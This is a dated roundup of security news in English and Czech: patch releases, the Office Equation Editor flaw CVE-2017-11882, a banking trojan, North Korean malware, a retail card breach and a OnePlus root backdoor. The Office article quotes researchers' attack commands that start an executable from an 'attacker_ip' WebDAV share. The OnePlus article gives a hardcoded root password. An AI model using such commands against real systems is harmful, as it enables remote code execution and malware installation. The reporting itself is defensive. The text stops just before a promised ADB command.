Patch Tuesday: Microsoft Releases Update to Fix 53 Vulnerabilities
15.11.2017 thehackernews Vulnerebility

It's Patch Tuesday—time to update your Windows devices.
Microsoft has released a large batch of security updates as part of its November Patch Tuesday in order to fix a total of 53 new security vulnerabilities in various Windows products, 19 of which rated as critical, 31 important and 3 moderate.
The vulnerabilities impact the Windows OS, Microsoft Office, Microsoft Edge, Internet Explorer, Microsoft Scripting Engine, .NET Core, and more.
At least four of these vulnerabilities that the tech giant has now fixed have public exploits, allowing attackers to exploit them easily. But fortunately, none of the four are being used in the wild, according to Gill Langston at security firm Qualys.
The four vulnerabilities with public exploits identified by Microsoft as CVE-2017-8700 (an information disclosure flaw in ASP.NET Core), CVE-2017-11827 (Microsoft browsers remote code execution), CVE-2017-11848 (Internet Explorer information disclosure) and CVE-2017-11883 (denial of service affecting ASP.NET Core).
Potentially Exploitable Security Vulnerabilities
What's interesting about this month's patch Tuesday is that none of the Windows OS patches are rated as Critical. However, Device Guard Security Feature Bypass Vulnerability (CVE-2017-11830) and Privilege Elevation flaw (CVE-2017-11847) are something you should focus on.
Also, according to an analysis of Patch Tuesday fixes by Zero-Day Initiative, CVE-2017-11830 and another flaw identified as CVE-2017-11877 can be exploited to spread malware.
"CVE-2017-11830 patches a Device Guard security feature bypass vulnerability that would allow malware authors to falsely authenticated files," Zero-Day Initiative said.
"CVE-2017-11877 fixes an Excel security feature bypass vulnerability that fails to enforce macro settings, which are often used by malware developers."
The tech giant also fixed six remote code execution vulnerabilities exist "in the way the scripting engine handles objects in memory in Microsoft browsers."
Microsoft identified these vulnerabilities as CVE-2017-11836, CVE-2017-11837, CVE-2017-11838, CVE-2017-11839, CVE-2017-11871, and CVE-2017-11873, which could corrupt memory in such a way that attackers could execute malicious code in the context of the current user.
"In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft Edge and then convince a user to view the website," Microsoft said. "These websites could contain specially crafted content that could exploit the vulnerability."
17-Year-Old MS Office Flaw Lets Hackers Install Malware
Also, you should be extra careful when opening files in MS Office.
All versions of Microsoft Office released in the past 17 years found vulnerable to remote code execution flaw (CVE-2017-11882) that works against all versions of Windows operating system, including the latest Microsoft Windows 10 Creators Update.
However, due to improper memory operations, the component fails to properly handle objects in the memory, corrupting it in such a way that the attacker could execute malicious code in the context of the logged-in user.
Exploitation of this vulnerability requires opening a specially crafted malicious file with an affected version of Microsoft Office or Microsoft WordPad software, which could allow attackers to remotely install malware on targeted computers.
Adobe Patch Tuesday: Patches 62 Vulnerabilities
Besides fixing vulnerabilities in its various products, Microsoft has also released updates for Adobe Flash Player.
These updates correspond with Adobe Update APSB17-33, which patches 62 CVEs for Acrobat and Reader alone. So, Flash Player users are advised to ensure that they update Adobe across their environment to stay protected.
It should also be noted that last Patch Tuesday, Microsoft quietly released the patch for the dangerous KRACK vulnerability (CVE-2017-13080) in the WPA2 wireless protocol.
Therefore, users are also recommended to make sure that they have patched their systems with the last month's security patches.
Alternatively, users are strongly advised to apply November security patches as soon as possible in order to keep hackers and cybercriminals away from taking control of their computers.
For installing security updates, just head on to Settings → Update & security → Windows Update → Check for updates, or you can install the updates manually.


17-Year-Old MS Office Flaw Lets Hackers Install Malware Without User Interaction
15.11.2017 thehackernews Vulnerebility

You should be extra careful when opening files in MS Office.
When the world is still dealing with the threat of 'unpatched' Microsoft Office's built-in DDE feature, researchers have uncovered a serious issue with another Office component that could allow attackers to remotely install malware on targeted computers.
The vulnerability is a memory-corruption issue that resides in all versions of Microsoft Office released in the past 17 years, including Microsoft Office 365, and works against all versions of Windows operating system, including the latest Microsoft Windows 10 Creators Update.
Discovered by the security researchers at Embedi, the vulnerability leads to remote code execution, allowing an unauthenticated, remote attacker to execute malicious code on a targeted system without requiring user interaction after opening a malicious document.
The vulnerability, identified as CVE-2017-11882, resides in EQNEDT32.EXE, an MS Office component which is responsible for insertion and editing of equations (OLE objects) in documents.
However, due to improper memory operations, the component fails to properly handle objects in the memory, corrupting it in such a way that the attacker could execute malicious code in the context of the logged-in user.
Seventeen years ago, EQNEDT32.EXE was introduced in Microsoft Office 2000 and had been kept in all versions released after Microsoft Office 2007 in order to ensure the software remains compatible with documents of older versions.
DEMO: Exploitation Allows Full System Take Over

 

Exploitation of this vulnerability requires opening a specially crafted malicious file with an affected version of Microsoft Office or Microsoft WordPad software.
This vulnerability could be exploited to take complete control over a system when combined with Windows Kernel privilege escalation exploits (like CVE-2017-11847).
Possible Attack Scenario:
While explaining the scope of the vulnerability, Embedi researchers suggested several attack scenarios listed below:
"By inserting several OLEs that exploited the described vulnerability, it was possible to execute an arbitrary sequence of commands (e.g., to download an arbitrary file from the Internet and execute it)."
"One of the easiest ways to execute arbitrary code is to launch an executable file from the WebDAV server controlled by an attacker."
"Nonetheless, an attacker can use the described vulnerability to execute the commands like cmd.exe /c start \\attacker_ip\ff. Such a command can be used as a part of an exploit and triggers starting WebClient."
"After that, an attacker can start an executable file from the WebDAV server by using the \\attacker_ip\ff\1.exe command. The starting mechanism of an executable file is similar to that of the \\live.sysinternals.com\tools service."
Protection Against Microsoft Office Vulnerability
With this month's Patch release, Microsoft has addressed this vulnerability by changing how the affected software handles objects in memory.
So, users are strongly recommended to apply November security patches as soon as possible to keep hackers and cybercriminals away from taking control of their computers.
Since this component has a number of security issues which can be easily exploited, disabling it could be the best way to ensure your system security.
Users can run the following command in the command prompt to disable registering of the component in Windows registry:
reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
For 32-bit Microsoft Office package in x64 OS, run the following command:
reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
Besides this, users should also enable Protected View (Microsoft Office sandbox) to prevent active content execution (OLE/ActiveX/Macro).


Americký tajný agent ukradl milióny. V bitcoinech

15.11.2017 Novinky/Bezpečnost Kriminalita
Pořádný balík peněz si chtěl ulít bokem Shaun Bridges ještě v době, kdy pracoval jako agent tajné služby Spojených států. Šlo v přepočtu o bezmála deset miliónů korun, které odcizil v bitcoinech během vyšetřování nelegálního internetového tržiště Silk Road.
Bývalý tajný agent Shaun Bridges na archivním snímku
Bývalý tajný agent Shaun Bridges na archivním snímku

Bitcoiny a další virtuální měny
Virtuálních měn existuje mnoho. Jednou z nejstarších a aktuálně nejpopulárnějších jsou tzv. bitcoiny. Ty vznikly už v roce 2009, větší popularitě se ale těší v posledních letech. Tato měna byla vytvořena tak, aby se nedala ovlivňovat žádnou vládou ani centrální bankou.

Kybernetické mince „razí“ síť počítačů se specializovaným softwarem naprogramovaným tak, aby uvolňoval nové mince stabilním, ale stále klesajícím tempem. Počet mincí v oběhu má dosáhnout nakonec 21 miliónů, což má být kolem roku 2140.

Bitcoiny a další kryptoměny se těší velké popularitě především coby prostředek pro investici. Kurzy však často kolísají. Evropský bankovní úřad kvůli tomu dokonce varoval spotřebitele, že neregulované virtuální měny představují velké riziko. Jejich vklady totiž nejsou nijak chráněny. 

Bitcoiny se používají na nelegálních tržištích velmi často. Zločinci a počítačoví piráti totiž často využívají toho, že transakce v této měně nejsou jakkoliv vystopovatelné. A patrně toho se snažil využít i Bridges.

Ten během vyšetřování nashromáždil na 1600 bitcoinů. Místo toho, aby je předal svým nadřízeným, schoval je a následně je chtěl využít pro vlastní potřebu.

Podle současného kurzu má jeden bitcoin hodnotu okolo 6500 dolarů, tedy v přepočtu více než 142 000 korun. Balík 1600 virtuálních mincí by tak měl hodnotu přesahující čtvrt miliardy korun.

Tajný agent nicméně zpronevěřil bitcoiny v roce 2013, kdy měly ještě výrazně nižší hodnotu – jedna mince se tehdy obchodovala v přepočtu za zhruba šest tisíc korun, celkově tak měl lup hodnotu pouze 9,6 miliónu korun.

Dva roky za mřížemi
Bridges si nicméně své kořisti neužíval dlouho a byl nakonec letos v srpnu dopaden. U soudu nezapíral svou vinu a po příslibu vrácení 1500 bitcoinů byl odsouzen minulý týden ke dvěma rokům za mřížemi. Původně pro něj státní zástupce požadoval šest let vězení.

Sluší se podotknout, že Bridges není jediným tajným agentem, který byl v hledáčku amerického Federálního úřadu pro vyšetřování (FBI). Prozatím stále spravedlnosti uniká například jistý Carl Force.


Podvodníci vydělávají na příznivcích kryptoměn. Jak se bránit?

15.11.2017 Novinky/Bezpečnost Podvod
Minulý týden obletěla svět zpráva o tom, že se kybernetickým zločincům podařilo podstrčit tisícům lidí falešnou aplikaci směnárny s kybernetickými měnami Poloniex. Bezpečnostní experti antivirové společnosti Eset nyní vysvětlili, jak aplikace připraví uživatele o osobní data i finanční prostředky a jak se mohou lidé proti podobným podvodům bránit.

Poloniex je jednou z největších směnáren svého druhu, obchoduje se zde s více než stovkou různých typů virtuálních mincí, samozřejmě včetně nejpopulárnějších bitcoinů.

Právě díky velké popularitě se na ni v minulých měsících zaměřili počítačoví piráti. Těm se podařilo propašovat do oficiálního internetového obchodu Google Play podvodné aplikace, které vypadaly jako oficiální programy od zmiňované směnárny.

A že podvodné aplikace byly skutečně povedené, potvrzuje i fakt, že si je do svých přístrojů nainstalovalo více než pět tisíc lidí z různých koutů světa.

Kolik uživatelů nakonec své přihlašovací údaje dalo všanc kyberzločincům a kolik si počítačoví piráti na úkor podvedených lidí vydělali, není v tuto chvíli jasné. Bezpečnostní experti nicméně odhalili, jak si při útoku piráti počínali.

Útok byl velmi sofistikovaný
„Aby útočníci mohli ovládnout účet Poloniex pomocí některé ze škodlivých aplikací, musí nejprve získat osobní údaje pro přihlášení k účtu. Poté potřebují získat přístup k e-mailovému účtu přidruženému ke zneužitému účtu Poloniex, aby mohli mít kontrolu nad oznámeními o neoprávněných přihlášeních a transakcích. A konečně útočníci chtějí vzbudit zdání, že jejich aplikace funguje správně, aby předešli jakémukoli podezření, které by v uživateli mohli během celého procesu vyvolat,“ uvedl technický ředitel společnosti Eset Miroslav Dvořák.

Počítačoví piráti se zaměřili na uživatele oblíbené směnárny s kybernetickými měnami Poloniex.

Počítačoví piráti se zaměřili na uživatele oblíbené směnárny s kybernetickými měnami Poloniex.
Stránky internetové směnárny s kybernetickými měnami Poloniex

Ten zároveň připomněl, že podvodné aplikace byly zaznamenány ve dvou různých provedeních a že obě využívaly stejný způsob útoku. „Ke krádeži osobních dat dojde okamžitě poté, co uživatel spustí některou ze zmíněných aplikací a zadá do ní svoje přihlašovací údaje. Škodlivá aplikace zobrazí falešnou stránku, která požaduje zadání přihlašovacích údajů do směnárny Poloniex. Pokud uživatel citlivé údaje vyplní a klikne na Přihlásit, jsou jeho data odeslána útočníkům,“ přiblížil Dvořák.

„Jakmile mají útočníci přístup do účtu uživatele ve směnárně Poloniex a k němu přidruženému účtu u Gmailu, mohou jménem uživatele provádět transakce a současně mazat veškerá upozornění o neoprávněném přihlášení a prováděných transakcích, která přijdou do e-mailové schránky uživatele,“ zdůraznil bezpečnostní expert.

Celý útok byl tak dobře maskován, že jeho oběti si myslely, že aplikace pracuje korektně. Nic netušící uživatele pak počítačoví piráti obírali postupně dolar po dolaru.

Jak se chránit?
Jak je z řádků výše patrné, vhodné je tak k zabezpečení účtu ve směnárně Poloniex používat dvoufaktorovou autentizaci. Tedy ověřování přihlašování k účtu pomocí dalšího zařízení, například tedy s využitím chytrého telefonu. To platí i v případě dalších internetových účtů – podobným způsobem je možné zabezpečit například i Facebook. 

Bezpečnostní experti ze společnosti Eset přidali i několik rad, jak se před podobnými hrozbami bránit v budoucnu:

Ověřte si, zda služba, kterou používáte, skutečně nabízí mobilní aplikaci – pokud ano, aplikace by měla být propojena s oficiálními webovými stránkami dané služby.
Věnujte pozornost hodnocení aplikace od jiných uživatelů a čtěte jejich recenze.
Buďte opatrní, když vám aplikace třetích stran nabízejí upozornění a dialogová okna, která budí dojem, že jsou propojena s účtem u Googlu – zneužívání důvěry uživatelů ve služby Googlu je mezi kyberzločinci oblíbeným trikem.
Zvyšte míru zabezpečení používáním dvouúrovňového ověřování identity (2FA) – jeho význam bývá zásadní.
Používejte spolehlivá bezpečnostní řešení pro vaše mobilní zařízení. Na každém přístroji by měl být samozřejmostí antivirový program.


Cloudflare používá pro generování náhodných čísel stěnu plnou lávových lamp
15.11.2017 Živě.cz Zabezpečení
Cloudflare používá pro generování náhodných čísel stěnu plnou lávových lampCloudflare používá pro generování náhodných čísel stěnu plnou lávových lampCloudflare používá pro generování náhodných čísel stěnu plnou lávových lampCloudflare používá pro generování náhodných čísel stěnu plnou lávových lampCloudflare používá pro generování náhodných čísel stěnu plnou lávových lamp


Šifrování je silně závislé na náhodných číslech. Jejich generování ale není tak jednoduché, jak by se mohlo zdát. V minulosti se objevilo mnoho případů, kdy specializované hardwarové i softwarové generátory náhodných čísel měly slabinu, kvůli které šel proces obejít tak, aby průměrný odhad dalšího bitu byl vyšší než zcela náhodných 50 %.

Cloudfare místo strojů nebo drahého využití fyzikálního snímání různých fyzických procesů využívá zajímavý a velmi účinný systém generování náhodných.

Cloudflare je obří CDN, přes kterou prochází přibližně 10 % internetu. Jednou z primárních služeb je ochrana před útoky různého druhu, důležitá je proto bezpečnost a šifrování.

Aby Cloudflare měl k dispozici co možná nejvíce pseudonáhodná čísla, využívá k tomu nevšední způsob – stěnu plnou lávových lamp (LavaRand). Na tuto stěnu míří kamera, která neustále generuje různorodý obraz, jež se náhodně mění z obrovského počtu proměnných. Jak lze vidět na videu, nezáleží jen pohybu bublin v jednotlivých lampách, ale i na aktuálním podsvícení, šumu a podobně.
Zpracováním streamovaného videa svíticích lamp dochází ke generování náhodných čísel, ze kterých se teprve poté vytváří šifrovací klíče. Jednoduše řečeno stačí změna jediného pixelu v obraze a výsledný šifrovací klíč je zcela jiný, než všechny předchozí. Tento klíč se pak zpracovává přes několik dalších zdrojů entropie a nakonec slouží jako seed pro generování náhodných klíčů.

Simulace procesu s tolika náhodnými procesy je v současných a nejspíše i budoucích podmínkách takřka nemožná. Jak uvádí Tom Scott ve videu, jednodušší je použít prolomení šifrování hrubou silou. A to je vázané na výpočetní výkon.

Pokud si chcete o tomto systému přečíst více, Cloudflare zveřejnil na svém blogu podrobný popis.


Forever 21 Investigating Payment Card Breach
15.11.2017 securityweek  Cyber
Los Angeles-based fashion retailer Forever 21 informed customers on Tuesday that it has launched an investigation into a security incident involving payment systems.

The company said it recently learned from a third-party that credit and debit cards used at certain Forever 21 stores may have been compromised.

An investigation has been launched and a cybersecurity and forensics firm has been called in to assist. Forever 21 has provided few details about the incident, but noted that its investigation focuses on transactions made between March and October 2017.

The company has promised to share more information, including the list of affected stores and timeframes, in the upcoming period. It did, however, highlight that security mechanisms implemented in many of its stores made stealing payment card information difficult.

“Because of the encryption and tokenization solutions that Forever 21 implemented in 2015, it appears that only certain point of sale devices in some Forever 21 stores were affected when the encryption on those devices was not in operation,” the company said in a statement.

In the meantime, the company has advised customers to keep a close eye on credit card statements and immediately notify their bank of any unauthorized charges.

Forever 21 operates over 800 stores in 57 countries around the world. The company is the 5th largest specialty retailer in the United States.

“With its endless POS endpoints, the retail industry has always been a desirable target for cybercriminals,” said Mark Cline, a VP at managed security services firm Netsurion. “They know that if they can introduce malware into POS networks, they can make a decent amount of cash by selling credit card numbers on the dark web. With their millions of customers, large retailers, like Forever 21, have typically been the hardest hit. Companies must pay up to $172 per stolen record in clean-up costs.”

“If retail businesses haven’t hardened their IT and POS security, they should start now to protect themselves from POS malware, ransomware and other threats—especially as we move into the holiday shopping season,” Cline added. “They may be running anti-virus software and managed firewalls, but they may or may not be running a strong offense with active monitoring and threat detection.”

Forever 21 is not the only clothing retailer to report a payment card breach this year. Brooks Brothers and Buckle also reported finding malware on their payment systems. Eddie Bauer informed customers of a cyber intrusion last year.


Flaw in Siemens RTU Allows Remote Code Execution
15.11.2017 securityweek  Vulnerebility
Potentially serious vulnerabilities have been found in some Siemens SICAM remote terminal unit (RTU) modules, but patches will not be released as the product has been discontinued.

Researchers at IT security services and consulting company SEC Consult discovered the flaws in the SICAM RTU SM-2556 COM modules, which can be attached to SICAM 1703 and RTU substation controllers for LAN/WAN communications. The product is used worldwide in the energy and other sectors.

The most serious of the security holes is CVE-2017-12739, a critical vulnerability in the integrated web server that allows an unauthenticated attacker with network access to remotely execute code on affected devices.

The web server is also impacted by a reflected cross-site scripting (XSS) vulnerability that can be exploited by getting the targeted user to click on a link (CVE-2017-12738), and a flaw that can be exploited by a remote attacker to bypass authentication and obtain sensitive device information, including passwords (CVE-2017-12737).

The vulnerabilities affect devices running firmware versions ENOS00, ERAC00, ETA2, ETLS00, MODi00 and DNPi00. Since the product has been discontinued, Siemens has decided not to release patches. However, users can prevent potential attacks by disabling the affected web server, which is designed for diagnostics and is not needed for normal operation.

Siemens pointed out, however, that the vulnerable versions of the firmware may also be running on the SM-2558 COM module, the successor of SM-2556. The automation giant has advised customers to update to the newer ETA4, MBSiA0 and DNPiA1 firmware versions.

In its own advisory, SEC Consult said it reported the vulnerabilities to Siemens in late September. According to the company, the GoAhead webserver used by the RTU module was released in October 2003 and it’s affected by several known vulnerabilities.

SEC Consult has published proof-of-concept (PoC) code for the authentication bypass and XSS vulnerabilities.

Researchers haven’t found many vulnerabilities in Siemens SICAM products. ICS-CERT has only published a handful of advisories in the past years, but they mostly describe high severity and critical flaws.


New IcedID Banking Trojan Emerges
15.11.2017 securityweek  Virus
A newly discovered banking Trojan called IcedID was built with a modular design and modern capabilities when compared to older financial threats, IBM X-Force warns.

The new threat was first observed in September 2017 as part of test campaigns, and is now actively targeting banks, payment card providers, mobile services providers, payroll accounts, webmail accounts and e-commerce sites in the United States, along with two major banks in the United Kingdom.

Although it does include features comparable with those of other banking Trojans out there and can perform advanced browser manipulation tactics, IcedID does not seem to borrow code from other Trojans, IBM says. However, because the threat includes capabilities already on par with those of Trojans such as Zeus, Gozi and Dridex, the researchers believe IcedID will receive further updates soon.

As part of the initial infection campaigns, the new banking Trojan has been dropped through the Emotet Trojan, which led X-Force research to believe that its operators aren’t new to the threat arena.

Emotet has been the distribution vehicle for many malware families this year, mainly focused on the U.S., but also targeting the U.K. and other parts of the world. In 2017, Emotet has been serving “elite cybercrime groups from Eastern Europe, such as those operating QakBot and Dridex,”and has now added IcedID to its payload list, IBM says.

First spotted in 2014 as a banking Trojan, Emotet is distributed via malicious spam emails, usually inside documents that feature malicious macros. Once on a machine, Emotet achieves persistence and ensnares the system into a botnet. It also fetches a spamming module, a network worm module, and password and data stealers.

IcedID itself includes network propagation capabilities, which suggests its authors might be targeting businesses with the new threat. IBM observed the malware infecting terminal servers, which usually provide endpoints, printers, and shared network devices with a common connection point to a local area network (LAN) or a wide area network (WAN).

The Trojan queries the lightweight directory access protocol (LDAP) to discover other users to infect, the researchers say. They also note that, on the compromised systems, the malware sets up a local proxy for traffic tunneling to monitor the victim’s online activity and leverages both web injections and redirections to perform its nefarious operations.

IcedID downloads the configuration file (containing a list of targets) from its command and control (C&C) server when the user opens a web browser. It was also observed using secure sockets layer (SSL) for communication with the server.

The malware doesn’t appear to feature advanced anti-virtual machine (VM) or anti-research techniques, although it does require a reboot to complete the deployment, most likely to evade sandboxes that do not emulate rebooting.

For persistence, the malware creates a RunKey in the registry, after which it writes an RSA crypto key to the system into the AppData folder. The researchers have yet to determine the exact purpose of this key.

The redirection technique employed by IcedID is designed to appear as seamless as possible to the victim. Thus, the legitimate bank’s URL is displayed in the address bar, along with the bank’s correct SSL certificate, which means that the connection with the actual bank’s site is kept alive. The victim, however, is tricked into revealing their credentials on a fake web page. Through social engineering, the victim is also fooled into revealing transaction authorization elements.

During a single campaign in late October, the Trojan was observed communicating with four different C&C servers.

The malware’s operators also use a dedicated, web-based remote panel to orchestrate webinjection attacks for the targeted bank sites. The panel is accessible with a username and password combination. The server the panel communicates with is based on the OpenResty web platform.

“Webinjection panels are typically commercial offerings criminals buy in underground markets. It is possible that IcedID’s uses a commercial panel or that IcedID itself is commercial malware. However, at this time there is no indication that IcedID is being sold in the underground or Dark Web marketplaces,” IBM notes.


Adobe Patches 80 Flaws Across Nine Products
15.11.2017 securityweek  Vulnerebility
Adobe on Tuesday announced the availability of patches for a total of 80 vulnerabilities across the company’s Flash Player, Photoshop, Connect, Acrobat and Reader, DNG Converter, InDesign, Digital Editions, Shockwave Player, and Experience Manager products.

The highest number of vulnerabilities, 56, has been addressed in Acrobat and Reader for Windows and Mac. The list includes many critical uninitialized pointer access, use-after-free, buffer access, buffer over-read, buffer overflow, out-of-bounds read/write, improper array index validation, security bypass, type confusion, and untrusted pointer dereference issues that can be exploited for remote code execution.

A total of 16 companies and individuals have been credited for reporting the Acrobat and Reader security holes. Well over half of the flaws were discovered by employees of China-based Tencent.

Updates for the Windows, Mac, Linux and Chrome OS versions of Flash Player patch five critical out-of-bounds read and use-after-free vulnerabilities that can be exploited for remote code execution.

Critical code execution weaknesses have also been resolved in the Windows and Mac versions of Photoshop CC, and Shockwave Player for Windows.

In Adobe Connect, the company fixed four server-side request forgery (SSRF) and cross-site scripting (XSS) issues, and added a feature designed to help administrators protect users against clickjacking attacks.

In Digital Editions for Windows, Mac, iOS, and Android, Adobe addressed six bugs that can lead to disclosure of memory addresses and other information.

Adobe also advised users to update Experience Manager in order to address moderate and important severity XSS and information disclosure vulnerabilities. One critical memory corruption flaw was patched in DNG Converter for Windows, and one similar issue was resolved in InDesign for Windows and Mac.

Adobe says there is no evidence that any of these flaws have been exploited in the wild. On last month’s Patch Tuesday, Adobe announced that there had not been any security updates. However, the company was forced to release an out-of-band update just a few days later after learning of a Flash Player zero-day that had been exploited by a Middle Eastern threat actor to deliver spyware.

Microsoft has also released its Patch Tuesday updates. The company addressed more than 50 vulnerabilities, including 20 critical browser flaws.


Microsoft Patches 20 Critical Browser Vulnerabilities
15.11.2017 securityweek  Vulnerebility
Microsoft’s Patch Tuesday updates for November address more than 50 vulnerabilities, including 20 critical flaws affecting the company’s web browsers.

A total of 53 CVE identifiers have been assigned to the security bugs addressed by Microsoft this month. None of them appear to have been exploited in attacks before the company released the patches.

Three of the flaws have already been publicly disclosed. These are a browser memory corruption that can lead to code execution (CVE-2017-11827), an information disclosure issue in ASP.NET (CVE-2017-8700), and an information disclosure bug in Internet Explorer (CVE-2017-11848).

A total of 20 critical vulnerabilities have been addressed this month and they all affect Internet Explorer and/or Edge. The security holes exist due to the way the browsers, particularly the scripting engines they use, handle objects in memory.

The vulnerabilities can be exploited for arbitrary code execution by getting the targeted user to access a specially crafted website via the vulnerable web browser.

These critical flaws were reported to Microsoft by independent researchers and employees of Palo Alto Networks, Qihoo 360, Google, and the UK’s National Cyber Security Centre (NCSC). Many of the security holes were found by the Google Project Zero researcher known as Lokihardt and their details will likely be made public by Google in the upcoming period.

Other vulnerabilities patched this month by Microsoft include important severity denial-of-service (DoS) and privilege escalation bugs in ASP.NET, a Device Guard security feature bypass, information disclosure and security feature bypass issues in Edge, Office memory corruptions, and information disclosure, privilege escalation and DoS flaws in Windows.

Microsoft has also updated Adobe Flash Player components. Adobe has addressed a total of 80 vulnerabilities across nine products, including five critical out-of-bounds read and use-after-free vulnerabilities in Flash Player that can be exploited for remote code execution.

Last month, both Microsoft and Adobe patched zero-day vulnerabilities exploited by threat actors to deliver malware.


SAP Patches Critical Issues With November 2017 Security Updates
15.11.2017 securityweek  Vulnerebility
SAP today released its November 2017 set of patches to address 22 vulnerabilities across its product portfolio, including three issues rated Very High priority (Hot News).

The enterprise software maker included 13 patches in this month’s SAP Security Patch Day, to which 9 patches that are updates to previously released security notes are added.

Three of the security notes address vulnerabilities considered Hot News, one patches a High severity issue, while the remaining 18 security notes address Moderate risk bugs. The highest CVSS score of the patches is 9.1.

This is the first SAP Security Patch Day to include Hot News security notes after one of the April 2017 security patches addressed a Very High priority vulnerability in TREX / BWA that could allow an attacker to execute commands on the affected system.

All three Hot News security notes were updates to previously released notes. One of them was patched in September 2016 and is a code injection vulnerability in Text Conversion. Onapsis, a company that specializes in security SAP and Oracle applications and which reported the vulnerability, explains that SAP updated the security note with some additional correction instructions.

The other two flaws were both resolved in September 2017 and represent an information disclosure in SAP Landscape Management (LaMa) 3.0 and an information disclosure in LVM 2.1 and LaMa 3.0. Both bugs result in an attacker being able to access relevant data under certain conditions, Onapsis says.

According to ERPScan, another company that specializes in the security of SAP and Oracle software, 10 Support Package Notes should be added to the aforementioned 22 security notes, for a total of 32 patches (3 Hot News, 2 High, 26 Medium, and 1 Low).

13 of all the patches are updates to previously released notes and 15 of the notes were released after last month’s Security Patch Day but before today, ERPScan says.

SAP resolved 6 implementation flaws this month, 5 XSS bugs, 5 Information disclosure issues, 5 missing authorization checks, 3 XML external entity flaws, 2 directory traversal bugs, a local command execution, an OS command execution, a XSFR, a clickjacking bug, a privilege escalation flaw, and a log injection issue.

Some of the most dangerous vulnerabilities addressed this month include an implementation flaw (CVSS Base Score: 8) in SAP Management Console, a Cross-Site Scripting (XSS) vulnerability (CVSS Base Score: 6.1) in SAP SAPUI5, and a Cross-Site Scripting (XSS) vulnerability (CVSS Base Score: 6.1) in SAP BusinessObjects Analysis Edition for OLAP.

SAP also resolved a couple of issues impacting SAP Hana, namely an information disclosure vulnerability in SAP HANA Extended Application Services (XS Advanced) and an information disclosure in SAP NetWeaver Instance Agent Service.


U.S. Government Shares Details of FALLCHILL Malware Used by North Korea
15.11.2017 securityweek  BigBrothers
FALLCHILL Malware Used by North Korean Government Hackers is a Fully Functional RAT, DHS Says

The United States Department of Homeland Security (DHS) shared details of a hacking tool they say is being used by a threat group linked to the North Korean government known as “Hidden Cobra.”

The threat actor dubbed by the U.S. government “Hidden Cobra” is better known in the cybersecurity community as Lazarus Group, which is believed to be behind several high-profile attacks, including the ones targeting Sony Pictures, Bangladesh’s central bank, and financial organizations in Poland. Links have also been found between the threat actor and the recent WannaCry ransomware attacks, but some experts are skeptical.

FALLCHILL Malware

A joint alert issued by the DHS and FBI said a remote administration tool (RAT) known as FALLCHILL was used by the North Korean government to hack into companies in the aerospace, telecommunications, and finance sectors. The alert describes FALLCHILL as a “fully functional RAT with multiple commands that the actors can issue from a command and control (C2) server to a victim’s system via dual proxies.”

The U.S. Government has been able identify 83 network nodes in the infrastructure used by the FALLCHILL malware. The alert says that, according to a trusted third party, FALLCHILL uses fake SSL headers for communications. "After collecting basic system information, the backdoor will begin communication with the C&C server using a custom encrypted protocol with the header that resembles TLS/SSL packets," it reads."

In a separate alert issued Tuesday, the DHS and FBI shared a list of Internet Protocol (IP) addresses and other indicators of compromise (IOCs) associated with a variant of the Volgmer Trojan used by the North Korean government. The alert describes Volgmer as a backdoor Trojan “designed to provide covert access to a compromised system.” The DHS says at least 94 static IP addresses were identified to be connected to Volgmer's infrastrucutre, along with dynamic IP addresses registered across various countries.

According to DHS, the North Korea-linked hackers have been using Volgmer malware in attacks against the government, financial, automotive, and media industries since at least 2013.

“DHS and FBI are distributing these IP addresses to enable network defense and reduce exposure to North Korean government malicious cyber activity,” the alert states.

The DHS warned that spear phishing appears to be the primary delivery mechanism for Volgmer infections; but added that the Hidden Cobra threat actors also use a suite of custom tools, some of which could also be used to initially compromise a system.

The alert with technical details and IOCs on FALLCHILL are available here. The alert and technical details for the the Volgmer Trojan are available here.

In June, US-CERT released a technical alert to warn organizations of distributed denial-of-service (DDoS) attacks conducted by Hidden Cobra.


A Backdoor in OnePlus devices allows root access without unlocking bootloader
15.11.2017 securityaffairs Mobil

Expert discovered a backdoor in OnePlus devices that allows root access without unlocking the bootloader.
Other problems for the owners of the OnePlus smartphone, this time experts discovered a backdoor that allows root access without unlocking the bootloader.

Just over a month after OnePlus was caught collecting personally identifiable information on its users, the Chinese smartphone company has been found leaving a backdoor on almost all OnePlus handsets.

The Twitter user, who goes by the handle of “Elliot Anderson @fs0c131y,” (the name of the Mr. Robot’s main character), discovered a backdoor in OnePlus devices running OxygenOS that could allow anyone to obtain root access to the handsets.

13 Nov
Elliot Alderson @fs0c131y
Replying to @fs0c131y and 8 others
In the onCreate method if the intent is not null the escalatedUp method is called with the parameter enable=true and password=getIntent().getStringExtra("code"). Do you see where I'm going? pic.twitter.com/oa1i1NdlpU

Elliot Alderson @fs0c131y
The escalatedUp method is calling Privilege.escalate(password) and if the result is true, it set the system property persist.sys.adbroot and oem.selinux.reload_policy to 1 pic.twitter.com/92LeBfDPAv

6:39 PM - Nov 13, 2017
View image on Twitter
4 4 Replies 11 11 Retweets 35 35 likes
View image on Twitter
Most of the OnePlus devices, including OnePlus 2, 3, 3T and brand-new OnePlus 5, comes with a pre-installed diagnostic testing application dubbed EngineerMode.”

root oneplus devices android hacking

The app was developed by Qualcomm to help device manufacturers to easily test all hardware components of the devices.

The app is visible in the list of applications installed on the OnePlus devices.

The pre-installed app is exploitable by attackers with a physical access to the device and allows to gain root access on the smartphone.

The @fs0c131y user decompiled the EngineerMod APK and shared it on GitHub, he discovered the ‘DiagEnabled’ activity that could be opened with hardcoded password “Angela” to gain full root access on the smartphone, without even unlocking the bootloader.

13 Nov
Elliot Alderson @fs0c131y
Replying to @fs0c131y and 8 others
I will find time to make a POC.
But it's not the biggest issue with this app.

Elliot Alderson @fs0c131y
The DiagEnabled, which is a @Qualcomm made activity, is the best class in this EngineerMode APK. Check the methods in this activity: escalatedUp(boolean, string) sounds like a cool thing no 😀? pic.twitter.com/iQFfam6eg6

6:34 PM - Nov 13, 2017

1 1 Reply 2 2 Retweets 34 34 likes
Twitter Ads info and privacy
The problem is severe and OnePlus users must be informed that it is anyway possible to gain a root access to the device using a simple command.

root oneplus devices android hacking

The hack could be exploited by an attacker to perform several malicious activities, including the installation of a spyware or a bootkit.

The workaround to protect vulnerable OnePlus smartphones consists of disabling the root on their phones using the following command on ADB shell:

